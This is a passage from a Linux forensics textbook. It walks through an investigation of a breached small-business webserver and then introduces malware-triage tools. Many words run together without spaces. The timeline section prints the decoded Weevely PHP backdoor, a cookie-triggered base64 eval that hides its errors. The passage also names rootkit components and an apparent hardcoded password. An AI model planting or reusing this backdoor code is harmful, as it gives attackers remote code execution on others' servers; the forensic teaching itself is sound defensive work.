looklikewhentheattackerhastoworkalittleharder?Thatisthesubjectofthischapter.
THESCENARIOYou received a call from a new client, Phil’s Awesome Stuff (PAS). PAS is a smallcompanythatsellselectronickitsandotherfunitemstocustomersthatliketoplaywithnewtechnology.TheirCEO,Dr.PhilPotslar,hascalledyoubecause thewebmasterhasreportedthatthewebserverisactingstrangely.Asluckwouldhaveit,PASisalsorunningUbuntu14.04.
After interviewing Phil and thewebmaster, you discover that neither of them knowsmuch aboutLinux.Thewebmaster has only recently begun usingLinux after droppingInternetInformationServices(IIS)asawebserveruponlearninghowinsecureitwasataconference.ThecurrentsystemhasbeenupfortwomonthsandisbuiltonApache2andMySQL.ThewebsoftwareiswritteninPHP.Thehardwarewaspurchasedfromalocalcomputer shop two years ago and originally ran Windows 7 before being wiped andupgradedtoUbuntu.
Thewebmasterreports that thesystemseemssluggish.A“SystemProblemDetected”warning message also seems to be popping up frequently. Having completed yourinterviews. you are now ready to begin a limited live response in order to determine iftherehasbeenabreach.BeforetravelingtoPAS,youwalkedthewebmasterthroughtheprocessof installingsnortanddoingabasicpacketcapture fora littlewhile inorder tohavesomeadditionaldatatoanalyzeuponyourarrival.
INITIALLIVERESPONSEUponarrivingatPAS,youplugyourforensicsworkstationintothenetworkandstartyournetcatlistenersasshowninFigure9.1.Thenyouplugyourresponseflashdriveintothesubject machine, load known-good binaries, and execute the initial-scan.sh script asshowninFigure9.2.
FIGURE9.1
Startingacaseonforensicsworkstation.
FIGURE9.2
Loadingknown-goodbinariesandperformingtheinitialscanonthesubject.
Uponexamining the log filegeneratedby initial-scan.sh, itquicklybecomesapparentthatsomethingisamiss.Oneofthefirstthingsyounoticeisthatashellislisteningonport44965,asshowninFigure9.3.Usingnetcat,youperformaquickbannergrabonthisportandfindthatitreportsitselfasSSH-2.0-WinSSHD,asshowninFigure9.4.Afterdoing
someresearch,youdiscoverthatthisisadropbearSSHbackdoor.YouattempttoSSHtothismachinewhichconfirmsyoursuspicions(thisisalsoshowninFigure9.4).
FIGURE9.3
Partoftheinitial-scanlogfile.Highlightedportionshowsashellthatislisteningonport44965.
FIGURE9.4
BannergrabandSSHloginattemptthatconfirmtheexistenceofadropbearSSHbackdooronport44965.
Sofarweknowthat somethinghashappened,becauseabackdoorhasbeen installed.ExaminationoffailedloginattemptsrevealsalonglistoffailedattemptsforthejohnuserviaSSHonMay3at23:07.ThisisshowninFigure9.5.Itisnotyetcleariftheseattemptsoccurredbeforeorafterthebackdoorwasinstalled.
FIGURE9.5
Alargenumberoffailedloginattemptswithinthesameminute.
Further analysis of the initial-scan.sh log reveals a new user, mysqll, with a homedirectoryof /usr/local/mysqlhasbeencreated.Furthermore, theuser IDhasbeen set tozero,whichgivesthisnewuserrootaccess.TherelevantpartofthelogisshowninFigure9.6.
FIGURE9.6
Evidenceofabogususerwithrootaccess.
YougiveDr.Potslar thebadnews, thathiswebserverhas in factbeencompromised.Whenhehears of the backdoor, hemakes the decision to replace thewebserverwith anewmachine(itwas timeforanupgradeanyway).Anewmachine ispurchasedfromalocal store, and a friend of yours helps PAS install a fresh version of Ubuntu on themachine, install and configure Snort, set up a webserver with fresh code from thewebmaster’s code repository, replicate the MySQL database from the webserver, andswitchitoutfortheexistingserver.Yourfriendworkscloselywiththewebmastersothathecanperformthisprocessunassistedshouldthenewserverbecomere-infected.
Yourworkisfarfromover.Atthispointyouknowthatthemachinewascompromisedbutnothowandwhy.Oncethenewserverisinplaceandverifiedtobeworkingproperly,you use LiME to extract amemory image and then shut down the subjectmachine bypulling the plug. According to your initial-scan.sh log, themachine is running Ubuntu14.04 with a 3.16.0-30 kernel. As you already have a LiME module for this exactconfiguration, dumping the RAM was as simple as running sudo insmod lime-3.16-0-30-generic.ko “path=tcp:8888 format=lime” on the subjectsystem, and then running nc 192.168.56.101 8888 > ram.lime on theforensicsworkstation.
YoupulltheharddrivefromthesubjectcomputerandplaceitintoyourUSB3.0drivedock.Using theudevrules-basedwriteblocking,asdescribed inChapter4,anddcfldd,youcreateaforensicimageoftheharddrivewhichyoustoreonaportable6TBUSB3.0drivewithalloftheotherdatarelatedtothiscase.Eventhoughthechancesoffindingaremote attacker are slight, you still need to figure out what happened to prevent arecurrence.Also,wehavenotyetperformedenoughanalysis toruleoutan insiderwho
could be prosecuted or subject to a civil lawsuit. It never hurts to be able to prove theintegrityofyourevidence.
MEMORYANALYSISYoudecide to startwithmemory analysis in hopes that itwill guide you to the correctplaces during your filesystem analysis.As always, there is nothing that stops you fromswitchingbackandforthbetweenmemoryanalysisandfilesystemanalysis.Asbefore,wedefineanaliasforVolatilityinthe.bashrcfileasshowninFigure9.7.
FIGURE9.7
Addinganaliasto.bashrctomoreeasilyrunVolatility.
PartialresultsfromtheVolatilitylinux_pslistcommandareshowninFigure9.8.FromtheseresultsweseethatthissystemalsohastheXingYiQuanrootkit.Thein.ftpdprocessbeingrunwithaninvaliduserIDof4294936576inthelastlineofFigure9.8alsolooksabitsuspicious.
FIGURE9.8
Partial results from running the Volatility linux_pslist command against the PAS subject system. Thehighlightedportionshowsarootkitprocess.ThelastprocesslistedalsohasasuspicioususerID.
RunningtheVolatilitylinux_psauxcommandprovidessomemoredetailonwhatishappening.AscanbeseeninFigure9.9,inprocess8019theuserwithID1001changedto the bogusmysqll userwith the commandsumysqll. This generated a bash shellwith root privileges because mysqll has a user ID of zero (process 8021). Thexingyi_bindshell is runningwith rootprivileges inprocess8540.The rootkitwas likelystartedfromtheshellinprocess8021.Thiscanbeverifiedbyrunninglinux_pstree.
FIGURE9.9
Partial results from running the Volatility linux_psaux command against the PAS subject system. Thehighlightedportionshowsmaliciousactivity.
WenoticedadropbearSSHbackdoorlisteningonport44965.WecanusetheVolatilitylinux_netstatcommandandpipetheresultstogrepTCP todiscovertheprocessIDforthisprocess.PartialresultsfromthiscommandareshowninFigure9.10.FromtheresultsweseethatthedropbearprocessIDis1284.Thislowprocessnumbersuggeststhatdropbear has been set to automatically start. Thelinux_pstree results support thisinference.Furthermore,thelinux_pstreeresultsrevealthattherootshellinprocess9210waslaunchedbyxingyi_bindshellrunninginprocess8540.
FIGURE9.10
PartialresultsfromrunningtheVolatility linux_netstatcommandagainstthePASsubjectsystemandpipingtheoutputto“grepTCP”.
The process maps for the two suspicious processes are captured with thelinux_proc_maps command as shown in Figure 9.11. The process spaces for bothprogramsarealsodumpedtodiskforlateranalysisasshowninFigure9.12.
FIGURE9.11
Savingprocessmapsforsuspiciousprocesses.
FIGURE9.12
Savingprocessmemoryforsuspiciousprocesses.
Thelinux_bash command produces some very enlightening results. As shown inFigure 9.13 and Figure 9.14, the attacker is actively trying to become more deeplyembeddedinthesystem.Alotofmaliciousactivitywasrecordedinthebashhistoryforprocess9210.Theresultsfromlinux_pslistconfirmthatthisisarootshell.Figure9.13showstheattackerdownloadingandinstallingtheWeevelyPHPbackdoor.Later,inFigure9.14,theattackercanbeseendownloadingtherockyou.txtpasswordlistandthenperforminganonlinepasswordattackagainstthesueuseraccountwithHydra.
FIGURE9.13
Downloadingandinstallingarootkit.
FIGURE9.14
OnlinepasswordcrackingwithHydra.
Hydra was used against the local FTP server. Before launching Hydra, the attackercopied both the /etc/passwd and /etc/shadow files. It isn’t clear why Hydra was used,insteadof an offline password cracker like John theRipper. Perhaps the attacker didn’t
want tocopyoff thepasswdandshadowfiles.Using the localFTPserver forpasswordcrackingissomewhatfastandmaynotgeneratealertsifaninstalledIntrusionDetectionSystem(IDS)isn’tconfiguredtomonitorthistraffic.
Thelinux_psenv command run against processes 8540, 1284, and 9210 producesinterestingresults.SomeoftheresultsareshowninFigure9.15.Thehighlightedportionshows that a hidden directory /usr/mysql/.hacked has been created. The processenvironmentforthedropbearbackdoorconfirmsthatthisprogramisautomaticallystartedwhenthesystembootstorunlevel2orhigher.
FIGURE9.15
Partial results from running the Volatility linux_psenv command against suspicious processes on the PASsubjectsystem.
The entire suite of Volatility linux_check_xxxx commands was run against thePASsubjectsystem.Onlythelinux_check_syscallcommandreturnedanyresults.SomeoftheseresultsaredisplayedinFigure9.16.FromtheresultswecanseethatXingYi Quan has hooked the 64-bit system calls for open, lstat, dup, kill, getdents, chdir,rename, rmdir, andunlinkat.Whenviewedwith the completeoutput for this command,the addresses for hooked system calls are noticeably different from the unaltered callhandlers.
FIGURE9.16
PartialresultsfromtheVolatilitylinux_check_syscallcommandrunagainstthePASsubjectsystem.
The Volatility linux_enumerate_files command was run against the PASsubject system and the resultswere saved to a file. Egrepwas then used on the file tolocatecertainfilesinthefilesystemcache.ThepartialresultsshowninFigure9.17revealthat the rockyou.txt password list and the XingYi Quan rootkit are both stored in thehiddendirectory/usr/local/mysql/.hacked.
FIGURE9.17
Maliciousfilesstoredinahiddendirectory.
WhileVolatility could be used to retrieve some files from the file cache, it is likelyeasiertojustusethefilesystemimageforthispurpose.Ifthereisaneedtoretrievemoreinformationfromthememoryimage,thememoryimageisnotgoinganywhere.WemightreturntousingVolatilitywhenperformingmalwareanalysis.
FILESYSTEMANALYSISAtthispoint,weknowthereareatleasttwopiecesofmalwarethatwerelikelyinstalledaround May 4, based on the bash histories. We also know that a new user withadministrative privileges was created and that the attacker has attempted to crackadditionalpasswordsonthesystem.Whatwedonotknowyetiswhentheinitialbreachoccurredandhow.
Using our Python scripts from Chapter 5, the disk image is easily mounted on theforensicsworkstation.Oncethisisaccomplished,runninggrep1001onthepasswdfilerevealsthatuserID1001,whichwasusedtolaunchoneoftherootshells,belongstothemichaeluser,whoserealnameisMichaelKeaton.
Because the system was running a webserver, and the Weevely PHP backdoor wasinstalled,itmakessensetohavealookatthewebserverlogsforsomepossibleinsightintohow the breach occurred.We do not know at this point if the breachwas caused by aproblemwiththewebsite,butitiscertainlyworthcheckingout.
TheApachewebserverlogscanbefoundin/var/log/apache2.Thetwoprimarylogfilesare access.log and error.logwhich store requests and errors, respectively.Both of theselogs have the standard numbered archives. After examining the access logs, it isdiscoveredthatararelyused,obscurepage,calleddns-lookup.php,iscalled51timeslateonMay3.Alookattheerrorlogsreveals19errorsloggedaboutthesametime.SomeoftheseresultsareshowninFigure9.18.
FIGURE9.18
Evidenceofanattackonthewebserver.
Examinationof theMySQLlogs found in /var/log/mysqlcovering thesameperiodoftime reveals that theycontainmultiple errors.Thezcat commandwasused to cat thecompressedlogfiles,whichwerethenpipedtoegrep.Thecompletecommandusedwaszcat error.log.2.gz | egrep ’(^150503)|(ERROR)’. The regularexpression in the egrep command displays only lines that beginwith the date code forMay 3 or that contain an error. Partial results from this command are shown in Figure9.19.
FIGURE9.19
MySQLerrorsindicatingapossiblewebsiteattack.
Memoryanalysisrevealedtheexistenceofahiddendirectory/usr/local/mysql/.hacked.Issuing the command ls -al from the /usr/local/mysql directory reveals severalinteresting things.There is anotherhiddendirectory, /usr/local/mysql/.weevely, thatwascreatedshortlyafterthesuspiciouswebactivityoccurredonMay3.Immediatelyafterthewebserver attack, .bashrc and .bash_logout files were created in the /usr/local/mysqldirectory.A.bash_historyfileinthesamedirectoryrevealstheinstallationoftheweevelybackdoorwithapasswordof“hacked”.TheseresultsaredisplayedinFigure9.20.
FIGURE9.20
EvidenceoftheinstallationoftheweevelyPHPSSHbackdoor.
LEVERAGINGMYSQLThe picture ofwhat happened to the PASwebserver is starting to become pretty clear.Becauseitliterallyonlytakesacoupleofminutes,themetadataisimportedintoMySQLusingthetechniquesdiscussedinChapter6.Onceeverythingisloadedinthedatabase,atimeline from May 3 onward is easily created. The timeline shows intense webserveractivityatapproximately22:50onthe3rdofMay.Furtheranalysisrevealschangesinthe/usr/local/mysql/.weevely directory at 23:53 and the creation of a new file,/var/www/html/index3.php.AportionofthetimelineisshowninFigure9.21.
FIGURE9.21
Portion of the PAS subject system timeline. The highlighted portion shows new files associated withbackdoors.
Theindex3.phpfile isshowninFigure9.22.Thisissomeobfuscatedcodecreatedbytheweevelybackdoor.Thiscodebothinsertsextracharactersandusesbase64encodingtohidewhatitdoes.$khbecomes“str_replace”,$hbhequals“base64_decode”,and$kmisset to “create_function”. This makes the last line $go = create_function(‘’,base64_decode(str_replace(“q”, “”, $iy.$gn.$mom.$scv))); $go();. Parsing all of thisthroughanonlinebase64decoderproducesthefollowing:
$c=’count’;$a=$_COOKIE;if(reset($a)==’ha’ && $c($a)>3){ini_set(‘error_log’,‘/dev/null’);$k=’cked’;echo
‘<’.$k.’>’;eval(base64_decode(preg_replace(array(‘/[^\w=\s]/’,’/\s/’), array(‘’,’+’),join(array_slice($a,$c($a)-3)))));echo‘</’.$k.’>’;}
FIGURE9.22
ObfuscatedPHPcodefromtheweevelyPHPSSHbackdoor.
Ifyoulookcloselyenough,youwillseetheweevelypassword“hacked”isembeddedinthiscode,whichisalsoobfuscated.
FurtheranalysisofthetimerevealsthatHydrawasrunafewtimesonthe4thofMay.Some of the packet captures created by thewebmaster, after a problemwas suspected,were also analyzed. There seems to have been a test of the dropbear backdoor on port44965 in thiscapture,butmost trafficseems tobecomingdirectlyonport22.SomeofthistrafficisshowninFigure9.23.
FIGURE9.23
SomeofthetrafficcapturedfromthePASsubjectsystem.Thebottomfourpacketsappeartobeatestofthedropbearbackdoor.TheremainingpacketsinthiscaptureareonthenormalSSHport22.
Partial results from running the query select * from logins order bystart; are shown in Figure 9.24. The highlighted entries are around the time of thebreach.AcompleteanalysisofthisinformationrevealsthatonlyJohnandMichaelhavebeen logging on to the system. This indicates that either John’s password has beencompromisedorthattheattackerisnotloggingindirectly.Theotherevidencegatheredsofarpointstothelatter.
FIGURE9.24
LogininformationfromthePASsubjectsystem.
Runningthisqueryoffailedloginsselect*fromlogin_failsorderbystart;paintsadifferentpicture.ThereisalongstringoffailedloginattemptsforJohnupuntil23:07:54on the3rdofMay.Whencombinedwitha successful remote loginbyJohnat23:10:11thatday,itwouldappearthatJohn’saccounthasbeencompromised.Thefailed logins are shown in Figure 9.25. At this stage it would appear that the initialcompromisewastheresultofawebservervulnerability.Oncetheattackerhadhisorherfootinthedoor,additionalattackswereperformedresultinginatleastonecompromisedpassword.
FIGURE9.25
Failedloginattempts.Thefailedattemptshappenrepeatedlyuntil23:07:54.ConsultationwiththeinformationfromFigure9.24indicatesthatthepasswordwascompromised.
Whilethebashhistoryfrom.bash_historyfilesdoesn’thavetimestamps,likethehistoryfromVolatility, it can still provide useful information.As shown inFigure 9.26, John’saccountwas used to download and install two additional rootkits, thatwe have not yetdiscovered.ThefirstoneisawebshellcalledPoison,thatwasinstalledonthewebserverasindex2.php.ThesecondoneiscalledRK.
FIGURE9.26
Evidenceoftheinstallationoftwoadditionalrootkits.
AlistingofPHPfilesinthedocumentrootandthestartoftheindex2.phpfileareshownin Figure 9.27. The index2.php claims to be the Poison Shell 1.0 byDoddyHackman.Noticethatthetimestamponindex2.phpisfrom2013,unlikesomeoftheotherpiecesofmalwarediscoveredsofarthatdidn’talterthetimestamps.
FIGURE9.27
EvidencethatthePoisonShell1.0hasbeeninstalledonthesubjectsystem.
Weseeahiddendirectorycalled“.rk”thatisusedtostoretheRKrootkit.Becausewehave the subject’s filesystem mounted, we can use the command find <mountpoint> -type d -name ’.*’ to locate all hidden directories. The results ofrunningthiscommandagainstthePASsubjectsystemareshowninFigure9.28.Notethatthe“.rk”directoryisnotlisted.Thisdirectorymusthavebeendeletedlater.Furthermore,nonewsuspiciousdirectoriesarefound.
FIGURE9.28
HiddendirectoriesonthePASsubjectsystem.
MISCELLANEOUSFINDINGSRunning the out-of-sequence-inodes.sh script from Chapter 7 on the /sbin directoryrevealed nothing interesting. As with our first case, running this script on the /bindirectory allows the Xing Yi Quan rootkit to be easily seen. Partial output from thiscommandisshowninFigure9.29.
FIGURE9.29
Outofsequenceinodesforarecentlyaddedrootkit.
AfteryouinformDr.Potslaroftheexcessiverequestsfordns-lookup.phponMay3,hepasses this information along to thewebmaster. Thewebmaster then has a look at thiscode with the help of a friend from the local OpenWeb Application Security Project(OWASP) chapter which he has recently joined. They discover a code executionvulnerabilityonthispage.
SUMMARYOFFINDINGSANDNEXTSTEPSYouarenowreadytowriteupyourreportforPAS.Yourreportshouldnormallyincludeanexecutivesummaryoflessthanapage,narrativethatisfreeofunexplainedtechnicaljargon, and concrete recommendations andnext steps (possiblywithpriority levels if itmakessense).Anyrawtooloutputsshouldbe includedinanappendixorappendicesattheendof the report, ifatall. Itmightmakesense toburnallof this toaDVD,whichincludestooloutputsandyourdatabasefiles.
Whatshouldyoudowiththesubjectharddriveandyourimage?Thatdependsonthesituation. In thiscase there isvery littlechanceofever finding theattacker.Even if theattacker were found, he or she would quite possibly in a jurisdiction that wouldmakeprosecution difficult or impossible. If this is not the case, a lawsuit might be a badbusiness decision given the costs involved (both money and time). No customerinformation is stored on the PAS subjectmachine. The vastmajority of the company’ssalesoccuratvariousconferencesand tradeshows.Customerswanting tobuyproductsfromthewebsitearedirectedtocallore-mailthecompany.Givenallofthis,youmightaswell return the hard drive to the company. The image can be retained for a reasonabletime,withthecostofthebackupdrivecontainingtheimageandallothercase-relatedfilesincludedonyourbilltoPAS.
Summaryoffindings:
OntheeveningofMay3,anattackerexploitedavulnerabilityinthedns-lookup.phpfileonthewebserver.Theattackerlikelyusedtheaccessgainedtogatherinformationaboutthesystem.Thedetailsofwhatheorshedidarenotavailablebecauseparameterssenttowebpagesarenotrecordedinthelogs.After repeated failed SSH login attempts using John’s account shortly after the breach (many of whichoccurred in thesameminute), theattackersuccessfully logged inusingJohn’saccount.Anonlinepasswordcracker,suchasHydra,waslikelyused.ThefactthatattackerwassuccessfulsoquicklysuggestthatJohnhasaweakpassword.Theattackerinstalledatleastthreerootkitsorbackdoorsonthesystem.Thereisevidencetosuggestthattheattackerattemptedtocrackotherpasswords.Michael’saccountwasusedononeoccasionwhichsuggestshispasswordmayhavebeencracked.AcommandtocrackSue’spasswordwasfoundinhistoryfiles.Itisunknowniftheattackagainstherpasswordwassuccessfulasheraccounthasneverbeenusedtologintothismachine.TheattackerseemstohaveprimarilyworkedviausingSSHtoremotelyloginwithJohn’saccount,whichhasadministrativeprivileges.Theattackercreatedabogusaccountwithausernameofmysqll.Thisaccounthadadministrativeprivileges.OnoneoccasiontheattackerloggedinremotelyasMichaelandthenswitchedtothemysqllaccount.
Recommendations:
Urgent:Fixthevulnerabilityindns-lookup.phpUrgent:All usersmust change passwords to something secure. It is recommended that new passwords areverifiedtonotbeintherockyou.txtpasswordlist.Important: Examine the entire website for other vulnerabilities. It is recommended that all items on theOWASPTop10 list (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)becheckedat aminimum.Recommended:InstallSnortorotherIntrusionDetectionSystemonthenewwebserver.Recommended:Supportthewebmasterinhiseffortstolearnmoreaboutwebsitesecurity.Recommended:Limitaccountsonthewebservertothebareminimum.Severalaccountsonthisserverappeartobeunused(i.e.Sue’saccountwhichwastargetedbytheattacker).Recommended: Periodic review of logswith emphasis on theApache andMySQL logs. The initial breachmighthavebeendetectedbysuchareview.Recommended: Periodic penetration tests should be performed. If hiring a penetration tester is noteconomicallyfeasible,ataminimum,thewebmasterorotherPASemployeeshouldbecomefamiliarwithanduseseveralwebvulnerabilityscanners.
SUMMARYInthischapterwewalkedthroughanattackthatwasslightlymoresophisticatedthanthePFE attack discussed earlier in this book.We found that the same techniques could beemployed,regardlessofthesophisticationleveloftheattacker.Gettingthefullpictureoftheattacker’sactions required theuseof liveanalysis,memoryanalysis, and filesystemanalysis.Wewereable to research themalware installed todiscover its functionality. Inthenextchapter,wewilldiscusshowtoanalyzeunknownexecutables.Ourconversationwillincludedeterminingifunknownfilesareactuallymalware.
CHAPTER
10MalwareINFORMATIONINTHISCHAPTER:
ThefilecommandUsinghashdatabasestoidentifymalwareUsingstringstogathercluesThenmcommandThelddcommandUsingreadelftogetthebigpictureUsingobjdumpfordisassemblyUsingstracetotracksystemcallsUsingltracetotracklibrarycallsUsingtheGNUDebuggerObfuscationtechniques
ISITMALWARE?You’vediscoveredafileleftbyanattackeronthesubjectsystem.Naturally,youwanttoknowifitissomesortofmalware.Thefirstthingyouwanttodoisclassifythefile.Isitanexecutableorsomesortofdatafile?Ifitisexecutable,whatdoesitdo?Whatlibrariesdoesituse?Doesitconnecttotheattackeracrossthenetwork?
While this isnotabookon reverseengineeringLinuxmalware, the information fromthis chapter should be sufficient for you to distinguish malware from benign files andgleanahigh-levelunderstandingofwhattypesoffunctionsmalwareperforms.Fromyourclient’s perspective, they do not care what the malware does or how many clevertechniqueswereusedbytheprogrammer.Theirbiggestconcerniswhatinformationmayhavebeencompromisedastheresultofthemalware.Thisshouldbeyourbiggestconcernaswell.Insomecases,youmayneedtodosomeinvestigationofthemalwaretohelpyoudeterminetheextentofthedamage.
ThefilecommandUnlikeWindows,whichstupidlyusesfileextensionstodeterminefiletype,Linuxissmartenough to determine what a file is by looking at its file signature. The Linux filecommand is used to display the file type to the user. The file command goes waybeyondprovidinginformationonafile’sextension.
The results of runningfile on some of the files associatedwith theXingYiQuan
rootkitfromthePASsubjectsystemareshowninFigure10.1.Noticethatfileisabletodistinguish between the install, README, and xingyi_addr.c files, which are anexecutablePerlscriptinASCIItext,aplainASCIItextfile,andaCsourcefileinASCIItext, respectively. Compare this to Windows, which cannot distinguish install fromREADME, because there is no file extension (which normally indicates a directory forWindows).
FIGURE10.1
ResultsofrunningthefilecommandonrootkitfilessavedfromthePASsubjectsystem.
Theinformationprovidedforbinaryfiles ismuchmorespecific.Hereweseethat thebinaries are 64-bit Executable and Linkable Format (ELF) files for little endian (LSB)systemsbasedontheSystemVbranchofUNIX(Linuxissuchasystem).Theyarealsodynamicallylinked,meaningtheyusesharedlibraries,asopposedtostaticallylinkingallthecodetheyneedintheexecutable(whichwouldmakeithuge).Thefileiscompatiblewithkernelversions2.6.24andhigher.Thefileshavenotbeenstrippedofthedebuggingsymbolinformation.ASecureHashAlgorithm(SHA)hashforeachbinarybuildidentifierisalsogiven.
Asyoucansee,thisonecommandprovidesquiteabitofinformation.Iffiledoesn’tidentifythesuspiciousfileasanexecutablebinaryorascript,itisprobablysomesortofdata file, or a component that was used to build somemalware. For files that are notexecutable, there are ways of telling if executables use a file. These methods will bediscussedlaterinthischapter(althoughtherearealsowaysofobscuringthisfromwould-bereverseengineers).
Isitaknown-badfile?
AnumberoforganizationsmaintaindatabasesofknownmalwareMD5andSHAhashes.Naturally, most of these hashes pertain to Windows, the king of malware, but manydatabases listLinuxmalwareaswell.Someof thesedatabasesmustbedownloadedandothersmustbeaccessedonline.Oneoftheonlinedatabasesthatisaccessibleviamultipleservices is theMalwareHashRegistry (MHR)maintainedbyTeamCymru(http://team-cymru.org/MHR.html).
OneofthenicethingsaboutMHRisthatitusesbothMD5andSHAhashes.TheSHAhashiseasilycalculatedusingsha1sum<filename>.PerhapstheeasiestwaytousetheMHR is via the whois command. The whois service is normally used to lookupinformation on a web domain. The syntax for using this service to check a binary iswhois-hhash.cymru.com<MD5orSHAhash>. If the file is known, theUNIXtimestampforthelastseentime,alongwiththeanti-virusdetectionpercentageisreturned.TheresultsofrunningthiscommandagainstoneoftheXingYiQuanfilesareshowninFigure10.2.
FIGURE10.2
CheckingabinaryhashagainsttheMalwareHashRegistry.
Whydidn’tthisreturnahit?Recallthathashfunctionsaredesignedsuchthatchangingasinglebitradicallychangesthehashvalue.ManypiecesofLinuxmalwarearebuiltonthe victim machine, which makes it easy to hard code values such as passwords andaddresses,whilesimultaneouslychanginganyhashvalues.
TheNationalInstituteofStandardsandTechnology(NIST)maintainsalargedatabaseofhashesknownastheNationalSoftwareReferenceLibrary(NSRL).Atpresentthereareover40millionMD5hashesinthisdatabase.UpdatestoNSRLarereleasedfourtimesayear. In order to avoid the need to download thismassive 6GB database and getmore
frequentupdates,aqueryserverhasbeensetup.
Using the NSRL query server requires the installation of a program known asnsrllookup. This program can be obtained from the following URL on githubhttps://github.com/rjhansen/nsrllookup/archive/v1.2.3.tar.gz.Thisprogramisveryeasytouse. Simply pipe an MD5 hash to it like so, md5sum <suspicious file> |nsrllookup.Ifthehashisunknown,itwillbeechoedbacktoyou.Ifyouprefertoseeonlyknownhashes,addthe-kflag.RunningnsrllookupagainstasetoffilesisshowninFigure10.3.
FIGURE10.3
Runningnsrllookupagainstalistoffiles.NoneofthefilesinthisdirectoryareintheNSRL,ascanbeseenbyrunningnsrllookupwiththe-kswitch.
TheNSRLcontainsknownfiles,bothgoodandbad.Ifyoudogetahit,youwillneedtoget the details from theNSRLwebsite to decide if a file ismalicious or benign.Thesequeries can be performed at http://www.hashsets.com/nsrl/search. An example known-goodLinuxbinaryisshowninFigure10.4.
FIGURE10.4
AnentryintheNSRLReferenceDataSet(RDS)foraknownLinuxbinary.
UsingstringsInmostcasesyourfilewillnotbelistedintheMHRorNSRL.Thesedatabasesarebest
used to whittle down the files to be examined if you have lots of suspect files. Thestrings utilitywill search a binary file forASCII text anddisplaywhatever it finds.Thesyntaxforthecommandisstrings-a<suspiciousfile>.Partialresultsfromrunningthecommandstrings-axingyi_bindshellareshowninFigure10.5.Pathnames to temporaryfilesandwhatcouldbeapasswordarehighlighted in thefigure.
FIGURE10.5
Runningstringsonasuspiciousbinary.
Youmaywanttocapturetheoutputfromstrings toafile.Anystrangeanduniquewords,suchas“sw0rdm4n”and“xingyi”,canbeusedforGooglesearches.Youmayseeseveral strings of the form <function>@@<library> that can tell you what libraryfunctionsarebeingusedinthiscode.Youwillonlyseethesestringsifdebuggingsymbolshave not been removed with strip. The results of running stringsxingyi_bindshell|grep@@|sortareshowninFigure10.6.
FIGURE10.6
Displayinglibraryfunctionswithstrings.Notethatthisonlyworksforbinariesthathaven’tbeenstripped.
ListingsymbolinformationwithnmThenmutilityisusedtolistsymbolsfromanobject(binary)file.Thiscommandproducesalistofsymbolsalongwiththeiraddresses(ifapplicable)andsymboltype.Someofthemore prevalent types are shown in Table 10.1. Generally speaking, lowercase symbolsdenotelocalsymbolsanduppercasesymbolsrepresentexternal(global)scope.Theoutputfrom nm can give some insight into the unknown file, by providing called libraryfunctions,localfunctionnames,andvariablenames.Naturally,ifthesesymbolshavebeenstrippedusingthestripcommand,nmproducesnooutput.Partialoutputfromrunningnmagainstthexingyi_bindshellfileisshowninFigure10.7.Severalsuspiciousfunctionandvariablenamescanbeseeninthefigure.
Table10.1.Commonnmsymboltypes.
Type Description
A Absolute(willnotchange)
B Uninitializeddatasection(BSS)
C Commonsymbol(uninitializeddata)
D Symbolisintheinitializeddatasection
G Symbolisinaninitializeddatasectionforsmallobjects
N Symbolisadebuggingsymbol
R Symbolisinread-onlydatasection
S Symbolisinuninitializeddatasectionforsmallobjects
T Symbolisinthecode(text)section
U Symbolisundefined.Usuallythismeansitisexternal(fromalibrary)
V,W Weaksymbol(canbeoverridden)
? Unknownsymboltype
FIGURE10.7
Partialoutputfromrunningnmagainstxingyi_bindshell.
ListingsharedlibrarieswithlddMostof theprevioussectionscamewith thecaveat that these toolsrelyonbinaries thathaven’t been stripped. Stripping binaries is a commonpractice for a couple of reasons.First, removing the symbols can result in a significantly smaller executable. Second,strippingthefilemakesithardertoreverseengineer(whetherornotitismalware).Whatcanyoudoifthefilehasbeenstripped?
Ifsharedlibrariesareused(whichisalmostcertainlythecase),thentheprogrammustbeable to find them.Also, thenamesofany functionsused in shared librariesmustbesomewhereintheprogram.Thenetofthis,assumingnoobfuscationtechniqueshavebeenemployed,isthatthestringscommandwilltellyouthenamesoffunctionscalledandlddwilltellyousharedlibrariesused.Thenamesofthesharedlibrariescannoteasilybeobfuscatedsincedoingsowouldcause the theprogram’sbuildprocess(specifically, thelaststepcalledlinking)tofail.
The syntax forldd is simplyldd<binary>. The results of runninglddagainstxingyi_bindshellandastrippedcopyofthesameareshowninFigure10.8.Notethattheresultsareidentical.Thefilecommandwasalsorunononeofthesharedlibraries,libc-2.19.so. There are two versions of this library, one with debugging symbols and onewithout.
FIGURE10.8
Runninglddagainstabinaryandthesamebinarythathasbeenstrippedofallsymbols.
ITHINKITISMALWAREIfcheckingafewhashdatabasesandGooglingsomeof thewordsyoufoundinthefileproducesnoresults,itistimetodigdeeperintothefile.Anaturalplacetostartwouldbeexaminingtheoverallfilestructure.Onceyouhaveahigh-levelviewofwhatisgoingon,youcanstartdrillingdownandlookingattheactualcodeifrequired.
GettingthebigpicturewithreadelfLinuxexecutablesare in theExecutableandLinkableFormat (ELF).AnELF file is anobjectfile,whichcanbeviewedintwodifferentways,dependingonwhatyouaretryingto do with it. Figure 10.9 shows the two views and different parts of the file that arerelevanttoeachview.
FIGURE10.9
ThetwoviewsofanELFfile.
AsshowninFigure10.9,allELFfileshaveaheader.Whenthefileisbeingexecuted,the Program Header Table (PHT) that follows the header is read. The PHT describesvarioussegments(largechunks)inthefile.InthelinkingviewthePHTisignoredandtheSection Header Table (SHT) at the end of the file is read. The SHT describes varioussections(whicharesubpartsofsegments)inthefile.
The readelf utility parses different parts of an ELF file. Thanks to this handyprogram, there is littleneed todig into thedetailsof theELFstructures.Thecommandreadelf–file-header<file>willdisplay theheader information.Theresultsof running thiscommandagainstxingyi_bindshell are shown inFigure10.10.From thefigure, we see this is a 64-bit executablewith nine program headers and thirty sectionheaders. All ELF files begin with the “magic number” 0x7F, followed by the string“ELF”,orjust0x7F0x450x4C0x46inhexadecimal.
FIGURE10.10
TheELFheaderinformationforxingyi_bindshell.
Thereadelf–section-headers<file>commandisusedtodisplaysectioninformation. The output from running readelf –section-headers -Wxingyi_bindshell is shown inFigure 10.11.The -Woption specifieswide format(not restricted to80charactersofwidth).The sectionsaredescribed inTable10.2.Thesectionsfromthisfilearefairlytypical.
FIGURE10.11
Sectionsfromthexingyi_bindshellfile.
Table10.2.Sectionsfromxingyi_bindshell.
Name Description
Null
.interp Dynamiclinkername
.note.ABI-tag Notecontaining“GNU”followedbyarchitectureinformation
